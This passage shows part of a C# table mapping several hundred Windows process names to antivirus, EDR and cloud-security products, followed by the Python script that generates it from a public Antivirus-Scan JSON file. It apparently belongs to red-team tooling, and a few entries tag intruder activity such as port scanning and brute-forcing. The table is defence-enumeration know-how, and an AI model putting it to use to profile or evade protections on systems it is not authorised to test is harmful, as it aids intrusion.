"Jiangmin"}, 133 | {"K7TSecurity.exe", "K7AntiVirus"}, 134 | {"K7TSMain.Exe", "K7AntiVirus"}, 135 | {"K7TSUpdT.exe", "K7AntiVirus"}, 136 | {"avp.exe", "Kaspersky(卡巴斯基)"}, 137 | {"avpcc.exe", "Kaspersky(卡巴斯基)"}, 138 | {"avpm.exe", "Kaspersky(卡巴斯基)"}, 139 | {"kavpf.exe", "Kaspersky(卡巴斯基)"}, 140 | {"kavfs.exe", "Kaspersky(卡巴斯基)"}, 141 | {"klnagent.exe", "Kaspersky(卡巴斯基)"}, 142 | {"kavtray.exe", "Kaspersky(卡巴斯基)"}, 143 | {"kavfswp.exe", "Kaspersky(卡巴斯基)"}, 144 | {"kaspersky.exe", "Kaspersky(卡巴斯基)"}, 145 | {"SDSystemTray.exe", "Max Secure Software"}, 146 | {"MaxRCSystemTray.exe", "Max Secure Software"}, 147 | {"RCSystemTray.exe", "Max Secure Software"}, 148 | {"MaxAVPlusDM.exe", "Max Secure Software"}, 149 | {"LiveUpdateSD.exe", "Max Secure Software"}, 150 | {"MBAMService.exe", "Malwarebytes"}, 151 | {"mbam.exe", "Malwarebytes"}, 152 | {"mbamtray.exe", "Malwarebytes"}, 153 | {"Mcshield.exe", "McAfee(迈克菲)"}, 154 | {"Tbmon.exe", "McAfee(迈克菲)"}, 155 | {"Frameworkservice.exe", "McAfee(迈克菲)"}, 156 | {"firesvc.exe", "McAfee(迈克菲)"}, 157 | {"firetray.exe", "McAfee(迈克菲)"}, 158 | {"hipsvc.exe", "McAfee(迈克菲)"}, 159 | {"mfevtps.exe", "McAfee(迈克菲)"}, 160 | {"mcafeefire.exe", "McAfee(迈克菲)"}, 161 | {"shstat.exe", "McAfee(迈克菲)"}, 162 | {"vstskmgr.exe", "McAfee(迈克菲)"}, 163 | {"engineserver.exe", "McAfee(迈克菲)"}, 164 | {"alogserv.exe", "McAfee(迈克菲)"}, 165 | {"avconsol.exe", "McAfee(迈克菲)"}, 166 | {"cmgrdian.exe", "McAfee(迈克菲)"}, 167 | {"cpd.exe", "McAfee(迈克菲)"}, 168 | {"mcmnhdlr.exe", "McAfee(迈克菲)"}, 169 | {"mcvsshld.exe", "McAfee(迈克菲)"}, 170 | {"mcvsrte.exe", "McAfee(迈克菲)"}, 171 | {"mghtml.exe", "McAfee(迈克菲)"}, 172 | {"mpfservice.exe", "McAfee(迈克菲)"}, 173 | {"mpfagent.exe", "McAfee(迈克菲)"}, 174 | {"mpftray.exe", "McAfee(迈克菲)"}, 175 | {"vshwin32.exe", "McAfee(迈克菲)"}, 176 | {"vsstat.exe", "McAfee(迈克菲)"}, 177 | {"guarddog.exe", "McAfee(迈克菲)"}, 178 | {"mfeann.exe", "McAfee(迈克菲)"}, 179 | {"udaterui.exe", "McAfee(迈克菲)"}, 180 | {"naprdmgr.exe", "McAfee(迈克菲)"}, 181 | {"mctray.exe", "McAfee(迈克菲)"}, 
182 | {"fcagate.exe", "McAfee(迈克菲)"}, 183 | {"fcag.exe", "McAfee(迈克菲)"}, 184 | {"fcags.exe", "McAfee(迈克菲)"}, 185 | {"fcagswd.exe", "McAfee(迈克菲)"}, 186 | {"macompatsvc.exe", "McAfee(迈克菲)"}, 187 | {"masvc.exe", "McAfee(迈克菲)"}, 188 | {"mcamnsvc.exe", "McAfee(迈克菲)"}, 189 | {"mctary.exe", "McAfee(迈克菲)"}, 190 | {"mfecanary.exe", "McAfee(迈克菲)"}, 191 | {"mfeconsole.exe", "McAfee(迈克菲)"}, 192 | {"mfeesp.exe", "McAfee(迈克菲)"}, 193 | {"mfefire.exe", "McAfee(迈克菲)"}, 194 | {"mfefw.exe", "McAfee(迈克菲)"}, 195 | {"mfemms.exe", "McAfee(迈克菲)"}, 196 | {"mfetp.exe", "McAfee(迈克菲)"}, 197 | {"mfewc.exe", "McAfee(迈克菲)"}, 198 | {"mfewch.exe", "McAfee(迈克菲)"}, 199 | {"MsMpEng.exe", "Microsoft Security Essentials"}, 200 | {"msseces.exe", "Microsoft Security Essentials"}, 201 | {"mssecess.exe", "Microsoft Security Essentials"}, 202 | {"emet_agent.exe", "Microsoft Security Essentials"}, 203 | {"emet_service.exe", "Microsoft Security Essentials"}, 204 | {"drwatson.exe", "Microsoft Security Essentials"}, 205 | {"MpCmdRun.exe", "Microsoft Security Essentials"}, 206 | {"NisSrv.exe", "Microsoft Security Essentials"}, 207 | {"MsSense.exe", "Microsoft Security Essentials"}, 208 | {"MSASCui.exe", "Microsoft Security Essentials"}, 209 | {"MSASCuiL.exe", "Microsoft Security Essentials"}, 210 | {"SecurityHealthService.exe", "Microsoft Security Essentials"}, 211 | {"nanoav.exe", "NANO-Antivirus"}, 212 | {"nanoav64.exe", "NANO-Antivirus"}, 213 | {"nanoreport.exe", "NANO-Antivirus"}, 214 | {"nanoreportc.exe", "NANO-Antivirus"}, 215 | {"nanoreportc64.exe", "NANO-Antivirus"}, 216 | {"nanorst.exe", "NANO-Antivirus"}, 217 | {"nanosvc.exe", "NANO-Antivirus"}, 218 | {"PanInstaller.exe", "Palo Alto Networks"}, 219 | {"remupd.exe", "Panda Security"}, 220 | {"apvxdwin.exe", "Panda Security"}, 221 | {"pavproxy.exe", "Panda Security"}, 222 | {"pavsched.exe", "Panda Security"}, 223 | {"360sd.exe", "Qihoo-360"}, 224 | {"360tray.exe", "Qihoo-360"}, 225 | {"ZhuDongFangYu.exe", "Qihoo-360"}, 226 | {"360rp.exe", "Qihoo-360"}, 
227 | {"360rps.exe", "Qihoo-360"}, 228 | {"360safe.exe", "Qihoo-360"}, 229 | {"360safebox.exe", "360保险箱 or Qihoo-360"}, 230 | {"QHActiveDefense.exe", "360TotalSecurity(360国际版) or Qihoo-360"}, 231 | {"360skylarsvc.exe", "Qihoo-360"}, 232 | {"LiveUpdate360.exe", "Qihoo-360"}, 233 | {"RavMonD.exe", "Rising"}, 234 | {"rfwmain.exe", "Rising"}, 235 | {"RsMgrSvc.exe", "Rising"}, 236 | {"RavMon.exe", "Rising"}, 237 | {"superantispyware.exe", "SUPERAntiSpyware"}, 238 | {"sascore.exe", "SUPERAntiSpyware"}, 239 | {"SAdBlock.exe", "SUPERAntiSpyware"}, 240 | {"sabsvc.exe", "SUPERAntiSpyware"}, 241 | {"UniversalAVService.exe", "SecureAge APEX"}, 242 | {"EverythingServer.exe", "SecureAge APEX"}, 243 | {"clamd.exe", "SecureAge APEX"}, 244 | {"SavProgress.exe", "Sophos AV"}, 245 | {"icmon.exe", "Sophos AV"}, 246 | {"SavMain.exe", "Sophos AV"}, 247 | {"SophosUI.exe", "Sophos AV"}, 248 | {"SophosFS.exe", "Sophos AV"}, 249 | {"SophosHealth.exe", "Sophos AV"}, 250 | {"SophosSafestore64.exe", "Sophos AV"}, 251 | {"SophosCleanM.exe", "Sophos AV"}, 252 | {"SophosFileScanner.exe", "Sophos AV"}, 253 | {"SophosNtpService.exe", "Sophos AV"}, 254 | {"SophosOsquery.exe", "Sophos AV"}, 255 | {"Sophos UI.exe", "Sophos AV"}, 256 | {"QQPCRTP.exe", "Tencent"}, 257 | {"QQPCTray.exe", "Tencent"}, 258 | {"QQPCMgr.exe", "Tencent"}, 259 | {"QQPCNetFlow.exe", "Tencent"}, 260 | {"QQPCRealTimeSpeedup.exe", "Tencent"}, 261 | {"AMRT.exe", "TotalDefense"}, 262 | {"SWatcherSrv.exe", "TotalDefense"}, 263 | {"Prd.ManagementConsole.exe", "TotalDefense"}, 264 | {"TrapmineEnterpriseService.exe", "Trapmine"}, 265 | {"TrapmineEnterpriseConfig.exe", "Trapmine"}, 266 | {"TrapmineDeployer.exe", "Trapmine"}, 267 | {"TrapmineUpgradeService.exe", "Trapmine"}, 268 | {"TMBMSRV.exe", "TrendMicro"}, 269 | {"ntrtscan.exe", "TrendMicro"}, 270 | {"Pop3Trap.exe", "TrendMicro"}, 271 | {"WebTrap.exe", "TrendMicro"}, 272 | {"PccNTMon.exe", "亚信安全防毒墙网络版 or TrendMicro"}, 273 | {"SBAMSvc.exe", "VIPRE"}, 274 | {"VipreEdgeProtection.exe", 
"VIPRE"}, 275 | {"SBAMTray.exe", "VIPRE"}, 276 | {"vrmonnt.exe", "ViRobot"}, 277 | {"vrmonsvc.exe", "ViRobot"}, 278 | {"Vrproxyd.exe", "ViRobot"}, 279 | {"npwebroot.exe", "Webroot"}, 280 | {"WRSA.exe", "Webroot"}, 281 | {"spysweeperui.exe", "Webroot"}, 282 | {"Yandex.exe", "Yandex"}, 283 | {"YandexDisk.exe", "Yandex"}, 284 | {"yandesk.exe", "Yandex"}, 285 | {"zillya.exe", "Zillya"}, 286 | {"ZAVAux.exe", "Zillya"}, 287 | {"ZAVCore.exe", "Zillya"}, 288 | {"vsmon.exe", "ZoneAlarm"}, 289 | {"zapro.exe", "ZoneAlarm"}, 290 | {"zonealarm.exe", "ZoneAlarm"}, 291 | {"ZPSTray.exe", "Zoner"}, 292 | {"dasc.exe", "eGambit"}, 293 | {"memscan64.exe", "eGambit"}, 294 | {"dastray.exe", "eGambit"}, 295 | {"consctl.exe", "eScan"}, 296 | {"mwaser.exe", "eScan"}, 297 | {"avpmapp.exe", "eScan"}, 298 | {"AAWTray.exe", "Lavasoft"}, 299 | {"LavasoftTcpService.exe", "Lavasoft"}, 300 | {"AdAwareTray.exe", "Lavasoft"}, 301 | {"WebCompanion.exe", "Lavasoft"}, 302 | {"WebCompanionInstaller.exe", "Lavasoft"}, 303 | {"adawarebp.exe", "Lavasoft"}, 304 | {"ad-watch.exe", "Lavasoft"}, 305 | {"cleaner8.exe", "The Cleaner"}, 306 | {"vba32lder.exe", "VBA32"}, 307 | {"MongoosaGUI.exe", "Mongoosa"}, 308 | {"mongoose.exe", "Mongoosa"}, 309 | {"CorantiControlCenter32.exe", "Coranti2012"}, 310 | {"UnThreat.exe", "UnThreat"}, 311 | {"utsvc.exe", "UnThreat"}, 312 | {"CKSoftShiedAntivirus4.exe", "Shield Antivirus"}, 313 | {"shieldtray.exe", "Shield Antivirus"}, 314 | {"AVWatchService.exe", "VIRUSfighter"}, 315 | {"vfproTray.exe", "VIRUSfighter"}, 316 | {"iptray.exe", "Immunet"}, 317 | {"PSafeSysTray.exe", "PSafe"}, 318 | {"PSafeCategoryFinder.exe", "PSafe"}, 319 | {"psafesvc.exe", "PSafe"}, 320 | {"nspupsvc.exe", "nProtect"}, 321 | {"Npkcmsvc.exe", "nProtect"}, 322 | {"npnj5Agent.exe", "nProtect"}, 323 | {"SpywareTerminatorShield.exe", "Spyware Terminator"}, 324 | {"SpywareTerminator.exe", "Spyware Terminator"}, 325 | {"ccSvcHst.exe", "Norton(赛门铁克)"}, 326 | {"rtvscan.exe", "Norton(赛门铁克)"}, 327 | {"ccapp.exe", 
"Symantec(赛门铁克) or Norton(赛门铁克)"}, 328 | {"NPFMntor.exe", "Norton(赛门铁克)"}, 329 | {"ccRegVfy.exe", "Norton(赛门铁克)"}, 330 | {"vptray.exe", "Symantec(赛门铁克) or Norton(赛门铁克)"}, 331 | {"iamapp.exe", "Norton(赛门铁克)"}, 332 | {"nav.exe", "Norton(赛门铁克)"}, 333 | {"navapw32.exe", "Norton(赛门铁克)"}, 334 | {"navapsvc.exe", "Norton(赛门铁克)"}, 335 | {"nisum.exe", "Norton(赛门铁克)"}, 336 | {"nmain.exe", "Norton(赛门铁克)"}, 337 | {"nprotect.exe", "Norton(赛门铁克)"}, 338 | {"smcGui.exe", "Symantec(赛门铁克) or Norton(赛门铁克)"}, 339 | {"ns.exe", "Norton(赛门铁克)"}, 340 | {"nortonsecurity.exe", "Norton(赛门铁克)"}, 341 | {"afwServ.exe", "Norton V25(Avast)"}, 342 | {"aswEngSrv.exe", "Norton V25(Avast)"}, 343 | {"aswidsagent.exe", "Norton V25(Avast)"}, 344 | {"AvDump.exe", "Norton V25(Avast)"}, 345 | {"nllToolsSvc.exe", "Norton V25(Avast)"}, 346 | {"NortonSvc.exe", "Norton V25(Avast)"}, 347 | {"wsc_proxy.exe", "Norton V25(Avast)"}, 348 | {"ccSetMgr.exe", "Symantec(赛门铁克)"}, 349 | {"ccpxysvc.exe", "Symantec(赛门铁克)"}, 350 | {"cfgwiz.exe", "Symantec(赛门铁克)"}, 351 | {"smc.exe", "Symantec(赛门铁克)"}, 352 | {"symproxysvc.exe", "Symantec(赛门铁克)"}, 353 | {"vpc32.exe", "Symantec(赛门铁克)"}, 354 | {"lsetup.exe", "Symantec(赛门铁克)"}, 355 | {"luall.exe", "Symantec(赛门铁克)"}, 356 | {"lucomserver.exe", "Symantec(赛门铁克)"}, 357 | {"sbserv.exe", "Symantec(赛门铁克)"}, 358 | {"ccEvtMgr.exe", "Symantec(赛门铁克)"}, 359 | {"snac.exe", "Symantec(赛门铁克)"}, 360 | {"SymCorpUI.exe", "Symantec(赛门铁克)"}, 361 | {"sepWscSvc64.exe", "Symantec(赛门铁克)"}, 362 | {"knsdtray.exe", "可牛杀毒"}, 363 | {"Miner.exe", "流量矿石"}, 364 | {"safedog.exe", "SafeDog(安全狗)"}, 365 | {"SafeDogGuardCenter.exe", "SafeDog(安全狗)"}, 366 | {"SafeDogSiteIIS.exe", "SafeDog(安全狗)"}, 367 | {"SafeDogTray.exe", "SafeDog(安全狗)"}, 368 | {"SafeDogServerUI.exe", "SafeDog(安全狗)"}, 369 | {"SafeDogSiteApache.exe", "SafeDog(安全狗)"}, 370 | {"CloudHelper.exe", "SafeDog(安全狗)"}, 371 | {"SafeDogUpdateCenter.exe", "SafeDog(安全狗)"}, 372 | {"parmor.exe", "木马克星"}, 373 | {"Iparmor.exe", "木马克星"}, 374 | {"beikesan.exe", "贝壳云安全"}, 375 
| {"TrojanHunter.exe", "木马猎手"}, 376 | {"GG.exe", "巨盾网游安全盾"}, 377 | {"adam.exe", "绿鹰安全精灵"}, 378 | {"AST.exe", "超级巡警"}, 379 | {"ananwidget.exe", "墨者安全专家"}, 380 | {"FYFireWall.exe", "风云防火墙"}, 381 | {"MPMon.exe", "微点主动防御"}, 382 | {"pfw.exe", "天网防火墙"}, 383 | {"D_Safe_Manage.exe", "D 盾"}, 384 | {"d_manage.exe", "D 盾"}, 385 | {"yunsuo_agent_service.exe", "云锁"}, 386 | {"yunsuo_agent_daemon.exe", "云锁"}, 387 | {"HwsPanel.exe", "护卫神"}, 388 | {"hws_ui.exe", "护卫神"}, 389 | {"hws.exe", "护卫神"}, 390 | {"hwsd.exe", "护卫神"}, 391 | {"HwsHostPanel.exe", "护卫神"}, 392 | {"HwsHostMaster.exe", "护卫神"}, 393 | {"hipstray.exe", "火绒安全"}, 394 | {"wsctrl.exe", "火绒安全"}, 395 | {"usysdiag.exe", "火绒安全"}, 396 | {"HipsDaemon.exe", "火绒安全"}, 397 | {"HipsLog.exe", "火绒安全"}, 398 | {"HipsMain.exe", "火绒安全"}, 399 | {"wsctrlsvc.exe", "火绒安全"}, 400 | {"WEBSCANX.exe", "网络病毒克星"}, 401 | {"SPHINX.exe", "SPHINX防火墙"}, 402 | {"TQClient.exe", "奇安信天擎"}, 403 | {"TQTray.exe", "奇安信天擎"}, 404 | {"QaxEngManager.exe", "奇安信天擎"}, 405 | {"TQDefender.exe", "奇安信天擎"}, 406 | {"avwin.exe", "H+BEDV Datentechnik GmbH"}, 407 | {"avwupsrv.exe", "H+BEDV Datentechnik GmbH"}, 408 | {"blackd.exe", "IBM ISS Proventia"}, 409 | {"rapapp.exe", "IBM ISS Proventia"}, 410 | {"eeyeevnt.exe", "eEye Digital Security"}, 411 | {"blink.exe", "eEye Digital Security"}, 412 | {"cv.exe", "TamoSoft"}, 413 | {"ent.exe", "TamoSoft"}, 414 | {"persfw.exe", "Kerio Personal Firewall"}, 415 | {"wrctrl.exe", "Kerio Personal Firewall"}, 416 | {"Trjscan.exe", "Simplysup"}, 417 | {"PCTAV.exe", "PC Tools AntiVirus"}, 418 | {"pctsGui.exe", "PC Tools AntiVirus"}, 419 | {"vbcmserv.exe", "VirusBuster Professional"}, 420 | {"ClamTray.exe", "ClamWin"}, 421 | {"clamscan.exe", "ClamWin"}, 422 | {"kxetray.exe", "金山毒霸 or 安天智甲"}, 423 | {"kscan.exe", "金山毒霸 or 安天智甲"}, 424 | {"AMediumManager.exe", "安天智甲"}, 425 | {"kismain.exe", "安天智甲"}, 426 | {"CMCNECore.exe", "CMC Endpoint Security"}, 427 | {"cmcepagent.exe", "CMC Endpoint Security"}, 428 | {"cmccore.exe", "CMC Endpoint Security"}, 429 | 
{"CMCLog.exe", "CMC Endpoint Security"}, 430 | {"CMCFMon.exe", "CMC Endpoint Security"}, 431 | {"kxescore.exe", "金山毒霸"}, 432 | {"kupdata.exe", "金山毒霸"}, 433 | {"kwsprotect64.exe", "金山毒霸"}, 434 | {"kislive.exe", "金山毒霸"}, 435 | {"knewvip.exe", "金山毒霸"}, 436 | {"kxecenter.exe", "金山毒霸"}, 437 | {"kxemain.exe", "金山毒霸"}, 438 | {"KWatch.exe", "金山毒霸"}, 439 | {"KSafeSvc.exe", "金山毒霸"}, 440 | {"KSafeTray.exe", "金山毒霸"}, 441 | {"outpost.exe", "Agnitum outpost (Outpost Firewall)"}, 442 | {"acs.exe", "Agnitum outpost (Outpost Firewall)"}, 443 | {"CynetLauncher.exe", "Cynet"}, 444 | {"CynetDS.exe", "Cynet"}, 445 | {"CynetEPS.exe", "Cynet"}, 446 | {"CynetMS.exe", "Cynet"}, 447 | {"CynetAR.exe", "Cynet"}, 448 | {"CynetGW.exe", "Cynet"}, 449 | {"CynetSD64.exe", "Cynet"}, 450 | {"winlogbeat.exe", "Elastic"}, 451 | {"KSWebShield.exe", "金山网盾"}, 452 | {"kpfwtray.exe", "金山网镖"}, 453 | {"1433.exe", "在扫1433"}, 454 | {"DUB.exe", "在爆破"}, 455 | {"ServUDaemon.exe", "发现S-U"}, 456 | {"baiduSafeTray.exe", "百度卫士"}, 457 | {"avkwctl9.exe", "G Data文件系统实时监控"}, 458 | {"AVKWCTL.exe", "G Data文件系统实时监控"}, 459 | {"SAVMAIN.exe", "Sophos Anti-Virus"}, 460 | {"safeboxTray.exe", "360保险箱"}, 461 | {"Notifier.exe", "亚信安全服务器深度安全防护系统"}, 462 | {"AliYunDun.exe", "阿里云盾"}, 463 | {"AliYunDunUpdate.exe", "阿里云盾"}, 464 | {"aliyun_assist_service.exe", "阿里云盾"}, 465 | {"BaradAgent.exe", "腾讯云安全"}, 466 | {"sgagent.exe", "腾讯云安全"}, 467 | {"YDService.exe", "腾讯云安全"}, 468 | {"YDLive.exe", "腾讯云安全"}, 469 | {"YDEdr.exe", "腾讯云安全"}, 470 | {"360WebSafe.exe", "360主机卫士Web"}, 471 | {"QHSrv.exe", "360主机卫士Web"}, 472 | {"QHWebshellGuard.exe", "360主机卫士Web"}, 473 | {"gov_defence_service.exe", "网防G01"}, 474 | {"gov_defence_daemon.exe", "网防G01"}, 475 | {"PC.exe", "云锁客户端"}, 476 | {"SNDSrvc.exe", "Symantec Shared诺顿邮件防火墙软件"}, 477 | {"USBKiller.exe", "U盘杀毒专家"}, 478 | {"360EntClient.exe", "天擎EDRAgent"}, 479 | {"360EntMisc.exe", "360(奇安信)天擎"}, 480 | {"alisecguard.exe", "阿里云-云盾"}, 481 | {"ALsvc.exe", "Sophos AutoUpdate Service"}, 482 | 
{"CmsGoAgent.windows-amd64.", "阿里云监控"}, 483 | {"edr_agent.exe", "深信服EDRAgent"}, 484 | {"edr_monitor.exe", "深信服EDRAgent"}, 485 | {"edr_sec_plan.exe", "深信服EDRAgent"}, 486 | {"rm_service.exe", "戎码翼龙 NG-EDR"}, 487 | {"rm_live.exe", "戎码翼龙 NG-EDR"}, 488 | {"rm_tray.exe", "戎码翼龙 NG-EDR"}, 489 | {"rm_hips.exe", "戎码翼龙 NG-EDR"}, 490 | {"ESAV.exe", "启明星辰天珣EDRAgent"}, 491 | {"ESCCControl.exe", "启明星辰天珣EDRAgent"}, 492 | {"ESCC.exe", "启明星辰天珣EDRAgent"}, 493 | {"ESCCIndex.exe", "启明星辰天珣EDRAgent"}, 494 | {"gse_win_agent.exe", "蓝鲸Agent"}, 495 | {"gse_win_daemon.exe", "蓝鲸Agent"}, 496 | {"LAVService.exe", "联想电脑管家"}, 497 | {"McsAgent.exe", "Sophos MCS Agent"}, 498 | {"McsClient.exe", "Sophos MCS Client"}, 499 | {"QHSafeMain.exe", "360TotalSecurity(360国际版)"}, 500 | {"QHSafeTray.exe", "360TotalSecurity(360国际版)"}, 501 | {"QHWatchdog.exe", "360TotalSecurity(360国际版)"}, 502 | {"sdcservice.exe", "Sophos Device Control Service"}, 503 | {"SEDService.exe", "Sophos Endpoint Defense Service"}, 504 | {"smartscreen.exe", "Windows Defender SmartScreen"}, 505 | {"SophosCleanM64.exe", "Sophos Clean Service"}, 506 | {"SophosFIMService.exe", "Sophos FIM"}, 507 | {"SSPService.exe", "Sophos System Protection Service"}, 508 | {"swc_service.exe", "Sophos Web Control Service"}, 509 | {"TitanAgent.exe", "天眼云镜"}, 510 | {"TitanMonitor.exe", "天眼云镜"}, 511 | {"TopsecMain.exe", "天融信终端防御"}, 512 | {"TopsecTray.exe", "天融信终端防御"}, 513 | {"wdswfsafe.exe", "360杀毒-网盾"}, 514 | {"WiseVector.exe", "智量安全"}, 515 | {"WiseVectorSvc.exe", "智量安全"}, 516 | {"QAXEntClient.exe", "天擎"}, 517 | {"QAXTray.exe", "天擎"}, 518 | {"AgentService.exe", "安恒主机卫士"}, 519 | {"ProtectMain.exe", "安恒主机卫士"}, 520 | {"Deep Security Manager.exe", "亚信DS服务端"}, 521 | {"dsa.exe", "亚信DS客户端"}, 522 | {"UniAccessAgent.exe", "亚信DS客户端"}, 523 | {"dsvp.exe", "亚信DS客户端"}, 524 | {"zabbix_agentd", "zabbix agen端"}, 525 | {"AliHips", "阿里系监控"}, 526 | {"AliNet", "阿里系监控"}, 527 | {"AliDetect", "阿里系监控"}, 528 | {"AliScriptEngine", "阿里系监控"}, 529 | {"secu-tcs-agent", "腾讯系监控"}, 530 | 
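"""Build out.txt, a C# dictionary initializer, from auto.json.

Reads auto.json from the current directory, maps every listed process name
to the product name(s) it belongs to, and writes one {"process", "product"}
entry per process name to out.txt.
"""
import json
from pathlib import Path

# Data source: https://github.com/Aabyss-Team/Antivirus-Scan/blob/main/auto.json
# The file comes from a third-party repository and its strings end up inside
# C# source text, so every value is escaped before it is written out.


def _cs_literal(text):
    """Return text as a double-quoted C# regular string literal.

    Backslashes and double quotes are escaped, and control characters and
    Unicode line terminators are written as \\uXXXX, so a value from the JSON
    file cannot end the literal early or change the generated code.
    """
    pieces = []
    for ch in text:
        code = ord(ch)
        if ch == "\\":
            pieces.append("\\\\")
        elif ch == '"':
            pieces.append('\\"')
        elif code < 0x20 or code in (0x7F, 0x85, 0x2028, 0x2029):
            pieces.append(f"\\u{code:04x}")
        else:
            pieces.append(ch)
    return '"' + "".join(pieces) + '"'


items = json.loads(Path("auto.json").read_bytes())

# process name -> product name; several products are joined with " or ".
# NOTE(review): keys are compared case-sensitively here, so two names that
# differ only in case become two entries; confirm this matches how the
# generated dictionary is looked up.
avmap = {}

for av, info in items.items():
    # Catch-all group for known security processes whose product name has not
    # been catalogued; it names no product, so it is skipped.
    if av == "已知杀软进程,名称暂未收录":
        continue
    for process in info["processes"]:
        # Entries containing "/" are not a single process name.
        if "/" in process:
            continue
        if process in avmap:
            # The newest product goes in front of the ones already recorded.
            avmap[process] = av + " or " + avmap[process]
        else:
            avmap[process] = av

with Path('out.txt').open('w', encoding='utf8') as f:
    # NOTE(review): the declaration carries no generic type arguments as shown
    # on this page; confirm against the repository before relying on it.
    f.write('static Dictionary av = new Dictionary {\n')
    for process, av in avmap.items():
        f.write(f' {{{_cs_literal(process)}, {_cs_literal(av)}}},\n')
    f.write("};")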
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/howmp/WinDump/756ef446c38719c1071b84dffe42125925a7b7ca/windump.png --------------------------------------------------------------------------------